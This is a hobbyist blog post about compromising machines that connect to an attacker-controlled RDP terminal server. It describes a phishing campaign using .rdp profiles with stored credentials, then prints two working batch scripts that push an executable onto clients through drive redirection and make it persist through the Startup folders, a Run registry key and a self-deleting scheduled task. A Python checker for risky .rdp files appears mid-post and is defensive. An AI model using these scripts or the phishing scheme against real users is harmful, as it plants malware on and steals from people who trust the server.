Attacking the RDP clients

Hi, welcome to my first attempt at something bloggish.

I have been doing some more playing with Terminal Services, or RDP, whatever you want to call it.
I have done a bunch of videos with this blog which I try to explain over the top, so I don't
have to write lots of information and miss things out, or have people bitching at my grammar!! :)

Anyway, this is my current work in progress / proof of concept on attacking clients that connect
to your terminal server. As you might remember from my BSides talk, I showed how a restricted user
can gain local admin rights on your RDP box. I went on to explain how s/he could attack the rest
of the network.. I felt like a twat saying that to people who know this.

I got my thinking cap on and thought about finding a way to attack the clients. Why attack the
clients, you say? Well:

1) The machines that connect to your terminal server are not bound by your security policy;
for example, personal machines or machines from other domains can still connect in.

2) Users who use corporate machines will probably keep their personal stuff local to their machine;
this could include password lists.

3) I can capture their passwords for other websites / applications.. what if I capture the domain admin's?

You get my drift, there are lots of reasons to attack the clients who connect.
Also, remember these users will trust this RDP server as they believe it is secure!!

So you can probably guess what I am going to show you: how you can infect users connecting
to an RDP server that I am in control of. But I faced three problems to get around:

1) Each machine that connects to the Terminal Server has a different name.

2) How do I copy files onto my target machine?

3) How do I get the malicious file to execute!!

I am now going to talk through the rough basics of connecting into Terminal Services.

Here is a rough overview of RDP and what is required to make this attack work.
You probably don't need to watch this LOL!

Video 1

OK!! You got me, this isn't a 0day attack, but I am still investigating if I can do this;
if anybody has any ideas on this please let me know.

You need to enable drive redirection, and yes, it's not on by default. But if a user enables drive
redirection it stays on. So if your end users don't have it on then this attack won't work :(
But don't worry.. I have a plan.

Video 2

As you can see, we have an option.. here is a scenario:
- I target company ABC and create an RDP server with that domain.
- I create an RDP profile linked to it with a stored username / password.
- I find the email format of company ABC, i.e. first.last@abc.com.
- I send out lots of phishing emails with the RDP profile attached, asking users to connect
into the server to access the latest stuff.
- Sit back and wait; people don't expect RDP as phishing :)
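Given that scenario (an attacker-supplied .rdp profile carrying a stored password and drive redirection), here is an added Python example, not code from the original post, that a mail gateway or help desk could use to flag such a profile before a user opens it. The .rdp property names are real; the two sample files, the hex blob and the trusted-host list are constructed.

```python
from typing import Dict, List, Tuple

# Constructed sample of the phishing profile described above (not a real file):
# unknown server, stored username/password, every client drive redirected.
PHISH_RDP = """\
screen mode id:i:2
full address:s:rdp.abc-latest-files.example:3389
username:s:abc\\first.last
password 51:b:01000000d08c9ddf0115d1118c7a00c04fc297eb
drivestoredirect:s:*
"""

# Constructed benign profile: approved server, no stored secret, no drive redirection.
SAFE_RDP = "full address:s:ts.corp.example\ndrivestoredirect:s:\n"


def parse_rdp(text: str) -> Dict[str, Tuple[str, str]]:
    """Return {name: (type, value)}. An .rdp line is 'name:type:value' with type
    s (string), i (integer) or b (hex blob); the value may itself contain colons,
    so split at most twice. Malformed lines are skipped."""
    settings: Dict[str, Tuple[str, str]] = {}
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) == 3:
            name, typ, value = parts
            settings[name.strip().lower()] = (typ.strip().lower(), value.strip())
    return settings


def audit_rdp(text: str, trusted_hosts: List[str]) -> List[str]:
    """Return one finding per risky property; an empty list means nothing was flagged."""
    s = parse_rdp(text)
    findings: List[str] = []
    host = s.get("full address", ("s", ""))[1].split(":")[0].lower()  # drop ':port'
    if host and host not in {h.lower() for h in trusted_hosts}:
        findings.append(f"target '{host}' is not an approved terminal server")
    drives = s.get("drivestoredirect", ("s", ""))[1]
    if drives:  # empty string means no drives are shared with the server
        findings.append(f"drive redirection on ('{drives}'): server can reach client drives via \\\\tsclient")
    if "password 51" in s:
        findings.append("stored password present: user connects without being asked for credentials")
    return findings


if __name__ == "__main__":
    for label, text in (("phish", PHISH_RDP), ("safe", SAFE_RDP)):
        print(label, audit_rdp(text, ["ts.corp.example"]) or ["no findings"])
```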

Anyway. Let's get back to the attack. I am going to talk you through prepping your newly hacked
terminal server!!

Video 3

Here is the code: new.bat

------------------------------
@echo off
net use z: /delete
net use z: \\tsclient\c

xcopy c:\test\wc.exe "Z:\windows\" /Y
xcopy c:\test\1st.bat "z:\Documents and Settings\All Users\Start Menu\Programs\Startup" /Y /i

if errorlevel 4 goto test
if errorlevel 0 goto exit

:test
z:
cd "documents and settings"
for /d %%a in (*) do xcopy /Y /I c:\test\wc.exe "z:\documents and settings\%%a\Start Menu\Programs\Startup\"
net use z: /delete
exit

:exit
net use z: /delete
exit
------------------------------

And here is the 1st.bat
------------------------------
@echo off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Updates /t REG_SZ /d C:\Windows\WC.exe

set h=%time:~0,2%
set m=%time:~3,2%
set /a m2=%m%+1

at %h%:%m2% c:\windows\wc.exe
at %h%:%m2% cmd /c del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\1st.bat"

exit
------------------------------

Remember the code might have wrapped around, and you will have to add or change things if you attack Windows 7, for example;
this is a PoC so it's against XP.

Ok, the server is primed!! :) All we need is someone to connect to it!
I am going to connect in with two users so you can see the effect on both.. the first will be the restricted user,
and the second will be a user with admin rights.

Video 4

Ok.. That's it. I hope you enjoyed it.

TTFN
Wicked Clown